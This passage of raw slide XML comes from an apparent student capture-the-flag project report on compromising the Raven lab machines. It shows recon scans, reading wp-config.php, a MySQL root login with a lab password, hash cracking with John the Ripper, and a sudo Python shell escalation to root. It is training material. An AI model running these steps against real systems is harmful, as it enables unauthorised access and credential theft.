            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr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Flag 1</a:t>
            </a:r>
            <a:endParaRPr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Exploitation Process</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Search for the word flag in all files while in the (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>) directory</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>grep -REioh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>flag[[:digit::]]{.+} ./html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;- command used to cat out/exfil data on flag 1</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Google Shape;137;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="884975" y="3105225"/>
            <a:ext cx="7588850" cy="918350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;138;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277300" y="1945850"/>
            <a:ext cx="2943225" cy="161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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Looking for privilege escalation credentials</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p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this point,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We sniffed around</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and looked for</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>entry points,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We found creds</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for the MySQL db. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;145;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2888700" y="1468825"/>
            <a:ext cx="5943600" cy="3365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Sniffing the MySQL Database/Tables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p2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Flag 3 &amp; 4 </a:t>
            </a:r>
            <a:endParaRPr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Exploit Used - [ SQL Injection ]</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Locate the MySQL Database</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cat /var/www/html/wordpress/wp-config.php</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mysql -u root -p (password: R@v3nSecurity)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F4CCCC"/>
              </a:highlight>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show databases;</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use wordpress;</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show tables;</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select * from wp_posts; (found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flags 3 &amp; 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>)  </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="104575" y="3272400"/>
            <a:ext cx="9144000" cy="1791475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992225" y="1807500"/>
            <a:ext cx="3137100" cy="14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Skimming through the MySQL table, we found flags 3 and 4, provided in the screenshot below by catting out everything: |</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>                V</a:t>
            </a:r>
            <a:endParaRPr>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Looking for Password Hashes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p2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oboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>creenshot below shows password hashes for privilege escalation by exploiting an sql injection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Incorrectly filtered escape characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>) the MySQL database/tables:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="160" name="Google Shape;160;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550725" y="2089300"/>
            <a:ext cx="7965949" cy="185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John The Ripper (Password Hash Cracking)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347825" y="1468825"/>
            <a:ext cx="84843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With the hashes that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>we obtained, we used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng"/>
              <a:t>JTR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>and gained credentials</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>for steven’s account</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>(root acct) and used them</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>to gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng"/>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>access on it.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167" name="Google Shape;167;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3658375" y="1468825"/>
            <a:ext cx="5639925" cy="3669250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347825" y="3418288"/>
            <a:ext cx="5962650" cy="166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7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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Spawning a Python shell (PTY Exploit)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p2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From ssh access with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Steven’s account, we</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Were able to spawn a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Python shell using</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> PTY shell sudo </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit. Escalating</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>From a non-interactive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>One to a fully working</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>terminal.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-Steven runs as primary user/root.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515866" y="1796571"/>
            <a:ext cx="5127526" cy="2500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Successfully Rooted the Machine!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p3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That concludes the exploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Process for Target 1, YAY.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Google Shape;182;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5155825" y="1269000"/>
            <a:ext cx="2724446" cy="3782000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="167550" y="2795200"/>
            <a:ext cx="4876800" cy="1352550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Google Shape;184;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1218072">
            <a:off x="7512243" y="3929837"/>
            <a:ext cx="883414" cy="883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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaking into Target 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Raven II Machine</a:t>
            </a:r>
            <a:endParaRPr sz="59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72500"/>
            <a:ext cx="8520600" cy="733500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Final Project - Introduction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;71;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completed following tasks as part of our project -</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Implemented alarms and thresholds in Kibana [Blue Team]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessed two more vulnerable VMs [Red Team]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Exploited the vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used Wireshark to analyze live malicious traffic on the network [Network]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Scanning with Nikto</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p3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Exploit Used</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>nikto -C all -h http://192.168.1.115/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This creates a list of URLs the Target HTTP server exposes. Generates a list of discovered URLs, discovers ‘wordpress’ directories</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="Google Shape;196;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-1709" l="0" r="0" t="1710"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654400" y="2332675"/>
            <a:ext cx="5943600" cy="2628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In-depth scanning with Gobuster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p3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Exploit Used</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>gobuster dir -e -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
